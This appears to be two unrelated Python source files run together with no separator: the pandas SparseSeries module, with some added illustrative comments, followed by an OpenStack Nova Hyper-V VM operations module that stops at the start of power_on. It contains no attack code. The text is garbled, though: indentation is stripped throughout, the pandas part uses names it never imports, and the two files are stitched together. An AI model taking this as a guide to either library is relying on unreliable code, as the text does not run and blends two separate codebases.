from pandas.core.index import Index, ensure_index, InvalidIndexError
from pandas.core.series import Series
from pandas.core.internals import SingleBlockManager
from pandas.core import generic
import pandas.core.common as com
import pandas.core.indexes.base as ibase
import pandas.core.ops as ops
import pandas._libs.index as libindex
from pandas.util._decorators import Appender
from pandas.core.sparse.array import (
make_sparse, SparseArray,
_make_index)
from pandas._libs.sparse import BlockIndex, IntIndex
import pandas._libs.sparse as splib
from pandas.core.sparse.scipy_sparse import (
_sparse_series_to_coo,
_coo_to_sparse_series)
_shared_doc_kwargs = dict(axes='index', klass='SparseSeries',
axes_single_arg="{0, 'index'}",
optional_labels='', optional_axis='')
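# Illustrative sketch (not part of pandas): constructing a SparseSeries and
# inspecting its sparse representation. SparseSeries is defined below in this
# module, so the name resolves when the helper is called, not when it is
# defined.
def _example_sparse_series():
    data = np.array([1.0, np.nan, np.nan, 3.0])
    ss = SparseSeries(data, kind='block')
    # sp_values holds only the non-fill entries; sp_index records their layout.
    return ss.sp_values, ss.sp_index, ss.fill_value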
class SparseSeries(Series):
"""Data structure for labeled, sparse floating point data
Parameters
----------
data : {array-like, Series, SparseSeries, dict}
.. versionchanged :: 0.23.0
If data is a dict, argument order is maintained for Python 3.6
and later.
kind : {'block', 'integer'}
fill_value : float
Code for missing value. Default depends on dtype:
0 for int dtype, False for bool dtype, and NaN for other dtypes
sparse_index : {BlockIndex, IntIndex}, optional
Only if you have one. Mainly used internally
Notes
-----
SparseSeries objects are immutable via the typical Python means. If you
must change values, convert to dense, make your changes, then convert back
to sparse
"""
_subtyp = 'sparse_series'
def __init__(self, data=None, index=None, sparse_index=None, kind='block',
fill_value=None, name=None, dtype=None, copy=False,
fastpath=False):
# we are called internally, so short-circuit
if fastpath:
# data is an ndarray, index is defined
if not isinstance(data, SingleBlockManager):
data = SingleBlockManager(data, index, fastpath=True)
if copy:
data = data.copy()
else:
if data is None:
data = []
if isinstance(data, Series) and name is None:
name = data.name
if isinstance(data, SparseArray):
if index is not None:
assert (len(index) == len(data))
sparse_index = data.sp_index
if fill_value is None:
fill_value = data.fill_value
data = np.asarray(data)
elif isinstance(data, SparseSeries):
if index is None:
index = data.index.view()
if fill_value is None:
fill_value = data.fill_value
# extract the SingleBlockManager
data = data._data
elif isinstance(data, (Series, dict)):
data = Series(data, index=index)
index = data.index.view()
res = make_sparse(data, kind=kind, fill_value=fill_value)
data, sparse_index, fill_value = res
elif isinstance(data, (tuple, list, np.ndarray)):
# array-like
if sparse_index is None:
res = make_sparse(data, kind=kind, fill_value=fill_value)
data, sparse_index, fill_value = res
else:
assert (len(data) == sparse_index.npoints)
elif isinstance(data, SingleBlockManager):
if dtype is not None:
data = data.astype(dtype)
if index is None:
index = data.index.view()
elif not data.index.equals(index) or copy: # pragma: no cover
# GH#19275 SingleBlockManager input should only be called
# internally
raise AssertionError('Cannot pass both SingleBlockManager '
'`data` argument and a different '
'`index` argument. `copy` must '
'be False.')
else:
length = len(index)
if data == fill_value or (isna(data) and isna(fill_value)):
if kind == 'block':
sparse_index = BlockIndex(length, [], [])
else:
sparse_index = IntIndex(length, [])
data = np.array([])
else:
if kind == 'block':
locs, lens = ([0], [length]) if length else ([], [])
sparse_index = BlockIndex(length, locs, lens)
else:
sparse_index = IntIndex(length, index)
v = data
data = np.empty(length)
data.fill(v)
if index is None:
index = ibase.default_index(sparse_index.length)
index = ensure_index(index)
# create/copy the manager
if isinstance(data, SingleBlockManager):
if copy:
data = data.copy()
else:
# create a sparse array
if not isinstance(data, SparseArray):
data = SparseArray(data, sparse_index=sparse_index,
fill_value=fill_value, dtype=dtype,
copy=copy)
data = SingleBlockManager(data, index)
generic.NDFrame.__init__(self, data)
self.index = index
self.name = name
@property
def values(self):
""" return the array """
return self.block.values
def __array__(self, result=None):
""" the array interface, return my values """
return self.block.values
def get_values(self):
""" same as values """
return self.block.to_dense().view()
@property
def block(self):
return self._data._block
@property
def fill_value(self):
return self.block.fill_value
@fill_value.setter
def fill_value(self, v):
self.block.fill_value = v
@property
def sp_index(self):
return self.block.sp_index
@property
def sp_values(self):
return self.values.sp_values
@property
def npoints(self):
return self.sp_index.npoints
@classmethod
def from_array(cls, arr, index=None, name=None, copy=False,
fill_value=None, fastpath=False):
"""Construct SparseSeries from array.
.. deprecated:: 0.23.0
Use the pd.SparseSeries(..) constructor instead.
"""
warnings.warn("'from_array' is deprecated and will be removed in a "
"future version. Please use the pd.SparseSeries(..) "
"constructor instead.", FutureWarning, stacklevel=2)
return cls(arr, index=index, name=name, copy=copy,
fill_value=fill_value, fastpath=fastpath)
@property
def _constructor(self):
return SparseSeries
@property
def _constructor_expanddim(self):
from pandas.core.sparse.api import SparseDataFrame
return SparseDataFrame
@property
def kind(self):
if isinstance(self.sp_index, BlockIndex):
return 'block'
elif isinstance(self.sp_index, IntIndex):
return 'integer'
def as_sparse_array(self, kind=None, fill_value=None, copy=False):
""" return my self as a sparse array, do not copy by default """
if fill_value is None:
fill_value = self.fill_value
if kind is None:
kind = self.kind
return SparseArray(self.values, sparse_index=self.sp_index,
fill_value=fill_value, kind=kind, copy=copy)
def __len__(self):
return len(self.block)
@property
def shape(self):
return self._data.shape
def __unicode__(self):
# currently, unicode is same as repr...fixes infinite loop
series_rep = Series.__unicode__(self)
rep = '{series}\n{index!r}'.format(series=series_rep,
index=self.sp_index)
return rep
def __array_wrap__(self, result, context=None):
"""
Gets called prior to a ufunc (and after)
See SparseArray.__array_wrap__ for detail.
"""
if isinstance(context, tuple) and len(context) == 3:
ufunc, args, domain = context
args = [getattr(a, 'fill_value', a) for a in args]
with np.errstate(all='ignore'):
fill_value = ufunc(self.fill_value, *args[1:])
else:
fill_value = self.fill_value
return self._constructor(result, index=self.index,
sparse_index=self.sp_index,
fill_value=fill_value,
copy=False).__finalize__(self)
def __array_finalize__(self, obj):
"""
Gets called after any ufunc or other array operations, necessary
to pass on the index.
"""
self.name = getattr(obj, 'name', None)
self.fill_value = getattr(obj, 'fill_value', None)
def _reduce(self, op, name, axis=0, skipna=True, numeric_only=None,
filter_type=None, **kwds):
""" perform a reduction operation """
return op(self.get_values(), skipna=skipna, **kwds)
def __getstate__(self):
# pickling
return dict(_typ=self._typ, _subtyp=self._subtyp, _data=self._data,
fill_value=self.fill_value, name=self.name)
def _unpickle_series_compat(self, state):
nd_state, own_state = state
# recreate the ndarray
data = np.empty(nd_state[1], dtype=nd_state[2])
np.ndarray.__setstate__(data, nd_state)
index, fill_value, sp_index = own_state[:3]
name = None
if len(own_state) > 3:
name = own_state[3]
# create a sparse array
if not isinstance(data, SparseArray):
data = SparseArray(data, sparse_index=sp_index,
fill_value=fill_value, copy=False)
# recreate
data = SingleBlockManager(data, index, fastpath=True)
generic.NDFrame.__init__(self, data)
self._set_axis(0, index)
self.name = name
def __iter__(self):
""" forward to the array """
return iter(self.values)
def _set_subtyp(self, is_all_dates):
if is_all_dates:
object.__setattr__(self, '_subtyp', 'sparse_time_series')
else:
object.__setattr__(self, '_subtyp', 'sparse_series')
def _ixs(self, i, axis=0):
"""
Return the i-th value or values in the SparseSeries by location
Parameters
----------
i : int, slice, or sequence of integers
Returns
-------
value : scalar (int) or Series (slice, sequence)
"""
label = self.index[i]
if isinstance(label, Index):
return self.take(i, axis=axis)
else:
return self._get_val_at(i)
def _get_val_at(self, loc):
""" forward to the array """
return self.block.values._get_val_at(loc)
def __getitem__(self, key):
try:
return self.index.get_value(self, key)
except InvalidIndexError:
pass
except KeyError:
if isinstance(key, (int, np.integer)):
return self._get_val_at(key)
elif key is Ellipsis:
return self
raise Exception('Requested index not in this series!')
except TypeError:
# Could not hash item, must be array-like?
pass
key = com._values_from_object(key)
if self.index.nlevels > 1 and isinstance(key, tuple):
# to handle MultiIndex labels
key = self.index.get_loc(key)
return self._constructor(self.values[key],
index=self.index[key]).__finalize__(self)
def _get_values(self, indexer):
try:
return self._constructor(self._data.get_slice(indexer),
fastpath=True).__finalize__(self)
except Exception:
return self[indexer]
def _set_with_engine(self, key, value):
return self._set_value(key, value)
def abs(self):
"""
Return an object with absolute value taken. Only applicable to objects
that are all numeric
Returns
-------
abs: same type as caller
"""
return self._constructor(np.abs(self.values),
index=self.index).__finalize__(self)
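# A minimal usage sketch for abs() with assumed example values: only the
# stored values change sign, while NaN fill locations are preserved.
# >>> sp = pd.SparseSeries([-1.0, np.nan, 2.0])
# >>> sp.abs().to_dense().tolist()
# [1.0, nan, 2.0]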
def get(self, label, default=None):
"""
Returns value occupying requested label, default to specified
missing value if not present. Analogous to dict.get
Parameters
----------
label : object
Label value looking for
default : object, optional
Value to return if label not in index
Returns
-------
y : scalar
"""
if label in self.index:
loc = self.index.get_loc(label)
return self._get_val_at(loc)
else:
return default
def get_value(self, label, takeable=False):
"""
Retrieve single value at passed index label
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
label : object
takeable : interpret the index as indexers, default False
Returns
-------
value : scalar value
"""
warnings.warn("get_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._get_value(label, takeable=takeable)
def _get_value(self, label, takeable=False):
loc = label if takeable is True else self.index.get_loc(label)
return self._get_val_at(loc)
_get_value.__doc__ = get_value.__doc__
def set_value(self, label, value, takeable=False):
"""
Quickly set single value at passed label. If label is not contained, a
new object is created with the label placed at the end of the result
index
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
label : object
Partial indexing with MultiIndex not allowed
value : object
Scalar value
takeable : interpret the index as indexers, default False
Notes
-----
This method *always* returns a new object. It is not particularly
efficient but is provided for API compatibility with Series
Returns
-------
series : SparseSeries
"""
warnings.warn("set_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._set_value(label, value, takeable=takeable)
def _set_value(self, label, value, takeable=False):
values = self.to_dense()
# if the label doesn't exist, we will create a new object here
# and possibly change the index
new_values = values._set_value(label, value, takeable=takeable)
if new_values is not None:
values = new_values
new_index = values.index
values = SparseArray(values, fill_value=self.fill_value,
kind=self.kind)
self._data = SingleBlockManager(values, new_index)
self._index = new_index
_set_value.__doc__ = set_value.__doc__
def _set_values(self, key, value):
# this might be inefficient as we have to recreate the sparse array
# rather than setting individual elements, but have to convert
# the passed slice/boolean that's in dense space into a sparse indexer
# not sure how to do that!
if isinstance(key, Series):
key = key.values
values = self.values.to_dense()
values[key] = libindex.convert_scalar(values, value)
values = SparseArray(values, fill_value=self.fill_value,
kind=self.kind)
self._data = SingleBlockManager(values, self.index)
def to_dense(self, sparse_only=False):
"""
Convert SparseSeries to a Series.
Parameters
----------
sparse_only : bool, default False
.. deprecated:: 0.20.0
This argument will be removed in a future version.
If True, return just the non-sparse values, or the dense version
of `self.values` if False.
Returns
-------
s : Series
"""
if sparse_only:
warnings.warn(("The 'sparse_only' parameter has been deprecated "
"and will be removed in a future version."),
FutureWarning, stacklevel=2)
int_index = self.sp_index.to_int_index()
index = self.index.take(int_index.indices)
return Series(self.sp_values, index=index, name=self.name)
else:
return Series(self.values.to_dense(), index=self.index,
name=self.name)
@property
def density(self):
r = float(self.sp_index.npoints) / float(self.sp_index.length)
return r
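# Illustrative note (assumed values): density is sp_index.npoints divided by
# sp_index.length, e.g. a SparseSeries built from [0.0, np.nan, 1.0, np.nan]
# with the default NaN fill value stores 2 of 4 points, so density == 0.5.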
def copy(self, deep=True):
"""
Make a copy of the SparseSeries. Only the actual sparse values need to
be copied
"""
new_data = self._data
if deep:
new_data = self._data.copy()
return self._constructor(new_data, sparse_index=self.sp_index,
fill_value=self.fill_value).__finalize__(self)
@Appender(generic._shared_docs['reindex'] % _shared_doc_kwargs)
def reindex(self, index=None, method=None, copy=True, limit=None,
**kwargs):
return super(SparseSeries, self).reindex(index=index, method=method,
copy=copy, limit=limit,
**kwargs)
def sparse_reindex(self, new_index):
"""
Conform sparse values to new SparseIndex
Parameters
----------
new_index : {BlockIndex, IntIndex}
Returns
-------
reindexed : SparseSeries
"""
if not isinstance(new_index, splib.SparseIndex):
raise TypeError('new index must be a SparseIndex')
block = self.block.sparse_reindex(new_index)
new_data = SingleBlockManager(block, self.index)
return self._constructor(new_data, index=self.index,
sparse_index=new_index,
fill_value=self.fill_value).__finalize__(self)
@Appender(generic._shared_docs['take'])
def take(self, indices, axis=0, convert=None, *args, **kwargs):
if convert is not None:
msg = ("The 'convert' parameter is deprecated "
"and will be removed in a future version.")
warnings.warn(msg, FutureWarning, stacklevel=2)
else:
convert = True
nv.validate_take_with_convert(convert, args, kwargs)
new_values = SparseArray.take(self.values, indices)
new_index = self.index.take(indices)
return self._constructor(new_values,
index=new_index).__finalize__(self)
def cumsum(self, axis=0, *args, **kwargs):
"""
Cumulative sum of non-NA/null values.
When performing the cumulative summation, any non-NA/null values will
be skipped. The resulting SparseSeries will preserve the locations of
NaN values, but the fill value will be `np.nan` regardless.
Parameters
----------
axis : {0}
Returns
-------
cumsum : SparseSeries
"""
nv.validate_cumsum(args, kwargs)
if axis is not None:
axis = self._get_axis_number(axis)
new_array = self.values.cumsum()
return self._constructor(
new_array, index=self.index,
sparse_index=new_array.sp_index).__finalize__(self)
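# A minimal sketch with assumed values, matching the docstring above: NaN
# locations are preserved and skipped in the running sum.
# >>> pd.SparseSeries([1.0, np.nan, 2.0]).cumsum().to_dense().tolist()
# [1.0, nan, 3.0]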
@Appender(generic._shared_docs['isna'] % _shared_doc_kwargs)
def isna(self):
arr = SparseArray(isna(self.values.sp_values),
sparse_index=self.values.sp_index,
fill_value=isna(self.fill_value))
return self._constructor(arr, index=self.index).__finalize__(self)
isnull = isna
@Appender(generic._shared_docs['notna'] % _shared_doc_kwargs)
def notna(self):
arr = SparseArray(notna(self.values.sp_values),
sparse_index=self.values.sp_index,
fill_value=notna(self.fill_value))
return self._constructor(arr, index=self.index).__finalize__(self)
notnull = notna
def dropna(self, axis=0, inplace=False, **kwargs):
"""
Analogous to Series.dropna. If fill_value=NaN, returns a dense Series
"""
# TODO: make more efficient
axis = self._get_axis_number(axis or 0)
dense_valid = self.to_dense().dropna()
if inplace:
raise NotImplementedError("Cannot perform inplace dropna"
" operations on a SparseSeries")
if isna(self.fill_value):
return dense_valid
else:
dense_valid = dense_valid[dense_valid != self.fill_value]
return dense_valid.to_sparse(fill_value=self.fill_value)
@Appender(generic._shared_docs['shift'] % _shared_doc_kwargs)
def shift(self, periods, freq=None, axis=0):
if periods == 0:
return self.copy()
# no special handling of fill values yet
if not isna(self.fill_value):
shifted = self.to_dense().shift(periods, freq=freq,
axis=axis)
return shifted.to_sparse(fill_value=self.fill_value,
kind=self.kind)
if freq is not None:
return self._constructor(
self.sp_values, sparse_index=self.sp_index,
index=self.index.shift(periods, freq),
fill_value=self.fill_value).__finalize__(self)
int_index = self.sp_index.to_int_index()
new_indices = int_index.indices + periods
start, end = new_indices.searchsorted([0, int_index.length])
new_indices = new_indices[start:end]
new_sp_index = _make_index(len(self), new_indices, self.sp_index)
arr = self.values._simple_new(self.sp_values[start:end].copy(),
new_sp_index, fill_value=np.nan)
return self._constructor(arr, index=self.index).__finalize__(self)
def combine_first(self, other):
"""
Combine Series values, choosing the calling Series's values
first. Result index will be the union of the two indexes
Parameters
----------
other : Series
Returns
-------
y : Series
"""
if isinstance(other, SparseSeries):
other = other.to_dense()
dense_combined = self.to_dense().combine_first(other)
return dense_combined.to_sparse(fill_value=self.fill_value)
def to_coo(self, row_levels=(0, ), column_levels=(1, ), sort_labels=False):
"""
Create a scipy.sparse.coo_matrix from a SparseSeries with MultiIndex.
Use row_levels and column_levels to determine the row and column
coordinates respectively. row_levels and column_levels are the names
(labels) or numbers of the levels. {row_levels, column_levels} must be
a partition of the MultiIndex level names (or numbers).
Parameters
----------
row_levels : tuple/list
column_levels : tuple/list
sort_labels : bool, default False
Sort the row and column labels before forming the sparse matrix.
Returns
-------
y : scipy.sparse.coo_matrix
rows : list (row labels)
columns : list (column labels)
Examples
--------
>>> s = pd.Series([3.0, np.nan, 1.0, 3.0, np.nan, np.nan])
>>> s.index = pd.MultiIndex.from_tuples([(1, 2, 'a', 0),
(1, 2, 'a', 1),
(1, 1, 'b', 0),
(1, 1, 'b', 1),
(2, 1, 'b', 0),
(2, 1, 'b', 1)],
names=['A', 'B', 'C', 'D'])
>>> ss = s.to_sparse()
>>> A, rows, columns = ss.to_coo(row_levels=['A', 'B'],
column_levels=['C', 'D'],
sort_labels=True)
>>> A
<3x4 sparse matrix of type '<class 'numpy.float64'>'
with 3 stored elements in COOrdinate format>
>>> A.todense()
matrix([[ 0., 0., 1., 3.],
[ 3., 0., 0., 0.],
[ 0., 0., 0., 0.]])
>>> rows
[(1, 1), (1, 2), (2, 1)]
>>> columns
[('a', 0), ('a', 1), ('b', 0), ('b', 1)]
"""
A, rows, columns = _sparse_series_to_coo(self, row_levels,
column_levels,
sort_labels=sort_labels)
return A, rows, columns
@classmethod
def from_coo(cls, A, dense_index=False):
"""
Create a SparseSeries from a scipy.sparse.coo_matrix.
Parameters
----------
A : scipy.sparse.coo_matrix
dense_index : bool, default False
If False (default), the SparseSeries index consists of only the
coords of the non-null entries of the original coo_matrix.
If True, the SparseSeries index consists of the full sorted
(row, col) coordinates of the coo_matrix.
Returns
-------
s : SparseSeries
Examples
--------
>>> from scipy import sparse
>>> A = sparse.coo_matrix(([3.0, 1.0, 2.0], ([1, 0, 0], [0, 2, 3])),
shape=(3, 4))
>>> A
<3x4 sparse matrix of type '<class 'numpy.float64'>'
with 3 stored elements in COOrdinate format>
>>> A.todense()
matrix([[ 0., 0., 1., 2.],
[ 3., 0., 0., 0.],
[ 0., 0., 0., 0.]])
>>> ss = pd.SparseSeries.from_coo(A)
>>> ss
0 2 1
3 2
1 0 3
dtype: float64
BlockIndex
Block locations: array([0], dtype=int32)
Block lengths: array([3], dtype=int32)
"""
return _coo_to_sparse_series(A, dense_index=dense_index)
# overwrite series methods with unaccelerated Sparse-specific versions
ops.add_flex_arithmetic_methods(SparseSeries)
ops.add_special_arithmetic_methods(SparseSeries)
|
|
# Copyright (c) 2010 Cloud.com, Inc
# Copyright 2012 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Management class for basic VM operations.
"""
import functools
import os
from oslo.config import cfg
from nova.api.metadata import base as instance_metadata
from nova import exception
from nova.openstack.common import excutils
from nova.openstack.common.gettextutils import _
from nova.openstack.common import importutils
from nova.openstack.common import log as logging
from nova.openstack.common import processutils
from nova.openstack.common import units
from nova import utils
from nova.virt import configdrive
from nova.virt.hyperv import constants
from nova.virt.hyperv import imagecache
from nova.virt.hyperv import utilsfactory
from nova.virt.hyperv import vhdutilsv2
from nova.virt.hyperv import vmutils
from nova.virt.hyperv import volumeops
LOG = logging.getLogger(__name__)
hyperv_opts = [
cfg.BoolOpt('limit_cpu_features',
default=False,
help='Required for live migration among '
'hosts with different CPU features'),
cfg.BoolOpt('config_drive_inject_password',
default=False,
help='Sets the admin password in the config drive image'),
cfg.StrOpt('qemu_img_cmd',
default="qemu-img.exe",
help='Path of qemu-img command which is used to convert '
'between different image types'),
cfg.BoolOpt('config_drive_cdrom',
default=False,
help='Attaches the Config Drive image as a cdrom drive '
'instead of a disk drive'),
cfg.BoolOpt('enable_instance_metrics_collection',
default=False,
help='Enables metrics collections for an instance by using '
'Hyper-V\'s metric APIs. Collected data can be retrieved '
'by other apps and services, e.g.: Ceilometer. '
'Requires Hyper-V / Windows Server 2012 and above'),
cfg.FloatOpt('dynamic_memory_ratio',
default=1.0,
help='Enables dynamic memory allocation (ballooning) when '
'set to a value greater than 1. The value expresses '
'the ratio between the total RAM assigned to an '
'instance and its startup RAM amount. For example a '
'ratio of 2.0 for an instance with 1024MB of RAM '
'implies 512MB of RAM allocated at startup')
]
CONF = cfg.CONF
CONF.register_opts(hyperv_opts, 'hyperv')
CONF.import_opt('use_cow_images', 'nova.virt.driver')
CONF.import_opt('network_api_class', 'nova.network')
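# A hypothetical nova.conf snippet showing how the options registered above
# could be set; the values are illustrative only:
#
#   [hyperv]
#   limit_cpu_features = False
#   config_drive_cdrom = True
#   qemu_img_cmd = C:\qemu-img\qemu-img.exe
#   dynamic_memory_ratio = 2.0
#
# With dynamic_memory_ratio = 2.0, an instance flavored with 1024MB of RAM
# would start with 512MB allocated, as described in the option help text.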
def check_admin_permissions(function):
@functools.wraps(function)
def wrapper(self, *args, **kwds):
# Make sure the Windows account has the required admin permissions.
self._vmutils.check_admin_permissions()
return function(self, *args, **kwds)
return wrapper
class VMOps(object):
_vif_driver_class_map = {
'nova.network.neutronv2.api.API':
'nova.virt.hyperv.vif.HyperVNeutronVIFDriver',
'nova.network.api.API':
'nova.virt.hyperv.vif.HyperVNovaNetworkVIFDriver',
}
def __init__(self):
self._vmutils = utilsfactory.get_vmutils()
self._vhdutils = utilsfactory.get_vhdutils()
self._pathutils = utilsfactory.get_pathutils()
self._volumeops = volumeops.VolumeOps()
self._imagecache = imagecache.ImageCache()
self._vif_driver = None
self._load_vif_driver_class()
def _load_vif_driver_class(self):
try:
class_name = self._vif_driver_class_map[CONF.network_api_class]
self._vif_driver = importutils.import_object(class_name)
except KeyError:
raise TypeError(_("VIF driver not found for "
"network_api_class: %s") %
CONF.network_api_class)
def list_instances(self):
return self._vmutils.list_instances()
def get_info(self, instance):
"""Get information about the VM."""
LOG.debug(_("get_info called for instance"), instance=instance)
instance_name = instance['name']
if not self._vmutils.vm_exists(instance_name):
raise exception.InstanceNotFound(instance_id=instance['uuid'])
info = self._vmutils.get_vm_summary_info(instance_name)
state = constants.HYPERV_POWER_STATE[info['EnabledState']]
return {'state': state,
'max_mem': info['MemoryUsage'],
'mem': info['MemoryUsage'],
'num_cpu': info['NumberOfProcessors'],
'cpu_time': info['UpTime']}
def _create_root_vhd(self, context, instance):
base_vhd_path = self._imagecache.get_cached_image(context, instance)
format_ext = base_vhd_path.split('.')[-1]
root_vhd_path = self._pathutils.get_root_vhd_path(instance['name'],
format_ext)
try:
if CONF.use_cow_images:
LOG.debug(_("Creating differencing VHD. Parent: "
"%(base_vhd_path)s, Target: %(root_vhd_path)s"),
{'base_vhd_path': base_vhd_path,
'root_vhd_path': root_vhd_path})
self._vhdutils.create_differencing_vhd(root_vhd_path,
base_vhd_path)
else:
LOG.debug(_("Copying VHD image %(base_vhd_path)s to target: "
"%(root_vhd_path)s"),
{'base_vhd_path': base_vhd_path,
'root_vhd_path': root_vhd_path})
self._pathutils.copyfile(base_vhd_path, root_vhd_path)
base_vhd_info = self._vhdutils.get_vhd_info(base_vhd_path)
base_vhd_size = base_vhd_info['MaxInternalSize']
root_vhd_size = instance['root_gb'] * units.Gi
# NOTE(lpetrut): Checking the namespace is needed as the
# following method is not yet implemented in vhdutilsv2.
if not isinstance(self._vhdutils, vhdutilsv2.VHDUtilsV2):
root_vhd_internal_size = (
self._vhdutils.get_internal_vhd_size_by_file_size(
root_vhd_path, root_vhd_size))
else:
root_vhd_internal_size = root_vhd_size
if root_vhd_internal_size < base_vhd_size:
error_msg = _("Cannot resize a VHD to a smaller size, the"
" original size is %(base_vhd_size)s, the"
" newer size is %(root_vhd_size)s"
) % {'base_vhd_size': base_vhd_size,
'root_vhd_size': root_vhd_internal_size}
raise vmutils.HyperVException(error_msg)
elif root_vhd_internal_size > base_vhd_size:
LOG.debug(_("Resizing VHD %(root_vhd_path)s to new "
"size %(root_vhd_size)s"),
{'root_vhd_size': root_vhd_internal_size,
'root_vhd_path': root_vhd_path})
self._vhdutils.resize_vhd(root_vhd_path, root_vhd_size)
except Exception:
with excutils.save_and_reraise_exception():
if self._pathutils.exists(root_vhd_path):
self._pathutils.remove(root_vhd_path)
return root_vhd_path
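# Worked example of the sizing check above (illustrative numbers): for a
# flavor with root_gb = 20, root_vhd_size is 20 * units.Gi bytes. If the
# cached base VHD reports a larger MaxInternalSize, HyperVException is
# raised because a VHD cannot be shrunk; if it reports a smaller size, the
# copied VHD is resized up to the flavor size.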
def create_ephemeral_vhd(self, instance):
eph_vhd_size = instance.get('ephemeral_gb', 0) * units.Gi
if eph_vhd_size:
vhd_format = self._vhdutils.get_best_supported_vhd_format()
eph_vhd_path = self._pathutils.get_ephemeral_vhd_path(
instance['name'], vhd_format)
self._vhdutils.create_dynamic_vhd(eph_vhd_path, eph_vhd_size,
vhd_format)
return eph_vhd_path
@check_admin_permissions
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info, block_device_info=None):
"""Create a new VM and start it."""
LOG.info(_("Spawning new instance"), instance=instance)
instance_name = instance['name']
if self._vmutils.vm_exists(instance_name):
raise exception.InstanceExists(name=instance_name)
# Make sure we're starting with a clean slate.
self._delete_disk_files(instance_name)
if self._volumeops.ebs_root_in_block_devices(block_device_info):
root_vhd_path = None
else:
root_vhd_path = self._create_root_vhd(context, instance)
eph_vhd_path = self.create_ephemeral_vhd(instance)
try:
self.create_instance(instance, network_info, block_device_info,
root_vhd_path, eph_vhd_path)
if configdrive.required_by(instance):
self._create_config_drive(instance, injected_files,
admin_password)
self.power_on(instance)
except Exception as ex:
LOG.exception(ex)
self.destroy(instance)
raise vmutils.HyperVException(_('Spawn instance failed'))
def create_instance(self, instance, network_info, block_device_info,
root_vhd_path, eph_vhd_path):
instance_name = instance['name']
self._vmutils.create_vm(instance_name,
instance['memory_mb'],
instance['vcpus'],
CONF.hyperv.limit_cpu_features,
CONF.hyperv.dynamic_memory_ratio)
ctrl_disk_addr = 0
if root_vhd_path:
self._vmutils.attach_ide_drive(instance_name,
root_vhd_path,
0,
ctrl_disk_addr,
constants.IDE_DISK)
ctrl_disk_addr += 1
if eph_vhd_path:
self._vmutils.attach_ide_drive(instance_name,
eph_vhd_path,
0,
ctrl_disk_addr,
constants.IDE_DISK)
self._vmutils.create_scsi_controller(instance_name)
self._volumeops.attach_volumes(block_device_info,
instance_name,
root_vhd_path is None)
for vif in network_info:
LOG.debug(_('Creating nic for instance: %s'), instance_name)
self._vmutils.create_nic(instance_name,
vif['id'],
vif['address'])
self._vif_driver.plug(instance, vif)
if CONF.hyperv.enable_instance_metrics_collection:
self._vmutils.enable_vm_metrics_collection(instance_name)
def _create_config_drive(self, instance, injected_files, admin_password):
if CONF.config_drive_format != 'iso9660':
raise vmutils.HyperVException(_('Invalid config_drive_format "%s"') %
CONF.config_drive_format)
LOG.info(_('Using config drive for instance'), instance=instance)
extra_md = {}
if admin_password and CONF.hyperv.config_drive_inject_password:
extra_md['admin_pass'] = admin_password
inst_md = instance_metadata.InstanceMetadata(instance,
content=injected_files,
extra_md=extra_md)
instance_path = self._pathutils.get_instance_dir(
instance['name'])
configdrive_path_iso = os.path.join(instance_path, 'configdrive.iso')
LOG.info(_('Creating config drive at %(path)s'),
{'path': configdrive_path_iso}, instance=instance)
with configdrive.ConfigDriveBuilder(instance_md=inst_md) as cdb:
try:
cdb.make_drive(configdrive_path_iso)
except processutils.ProcessExecutionError as e:
with excutils.save_and_reraise_exception():
LOG.error(_('Creating config drive failed with error: %s'),
e, instance=instance)
if not CONF.hyperv.config_drive_cdrom:
drive_type = constants.IDE_DISK
configdrive_path = os.path.join(instance_path,
'configdrive.vhd')
utils.execute(CONF.hyperv.qemu_img_cmd,
'convert',
'-f',
'raw',
'-O',
'vpc',
configdrive_path_iso,
configdrive_path,
attempts=1)
self._pathutils.remove(configdrive_path_iso)
else:
drive_type = constants.IDE_DVD
configdrive_path = configdrive_path_iso
self._vmutils.attach_ide_drive(instance['name'], configdrive_path,
1, 0, drive_type)
def _disconnect_volumes(self, volume_drives):
for volume_drive in volume_drives:
self._volumeops.disconnect_volume(volume_drive)
def _delete_disk_files(self, instance_name):
self._pathutils.get_instance_dir(instance_name,
create_dir=False,
remove_dir=True)
def destroy(self, instance, network_info=None, block_device_info=None,
destroy_disks=True):
instance_name = instance['name']
LOG.info(_("Got request to destroy instance: %s"), instance_name)
try:
if self._vmutils.vm_exists(instance_name):
# Stop the VM first.
self.power_off(instance)
storage = self._vmutils.get_vm_storage_paths(instance_name)
(disk_files, volume_drives) = storage
self._vmutils.destroy_vm(instance_name)
self._disconnect_volumes(volume_drives)
else:
LOG.debug(_("Instance not found: %s"), instance_name)
if destroy_disks:
self._delete_disk_files(instance_name)
except Exception as ex:
LOG.exception(ex)
raise vmutils.HyperVException(_('Failed to destroy instance: %s') %
instance_name)
def reboot(self, instance, network_info, reboot_type):
"""Reboot the specified instance."""
LOG.debug(_("reboot instance"), instance=instance)
self._set_vm_state(instance['name'],
constants.HYPERV_VM_STATE_REBOOT)
def pause(self, instance):
"""Pause VM instance."""
LOG.debug(_("Pause instance"), instance=instance)
self._set_vm_state(instance["name"],
constants.HYPERV_VM_STATE_PAUSED)
def unpause(self, instance):
"""Unpause paused VM instance."""
LOG.debug(_("Unpause instance"), instance=instance)
self._set_vm_state(instance["name"],
constants.HYPERV_VM_STATE_ENABLED)
def suspend(self, instance):
"""Suspend the specified instance."""
LOG.debug(_("Suspend instance"), instance=instance)
self._set_vm_state(instance["name"],
constants.HYPERV_VM_STATE_SUSPENDED)
def resume(self, instance):
"""Resume the suspended VM instance."""
LOG.debug(_("Resume instance"), instance=instance)
self._set_vm_state(instance["name"],
constants.HYPERV_VM_STATE_ENABLED)
def power_off(self, instance):
"""Power off the specified instance."""
LOG.debug(_("Power off instance"), instance=instance)
self._set_vm_state(instance["name"],
constants.HYPERV_VM_STATE_DISABLED)
def power_on(self, instance):
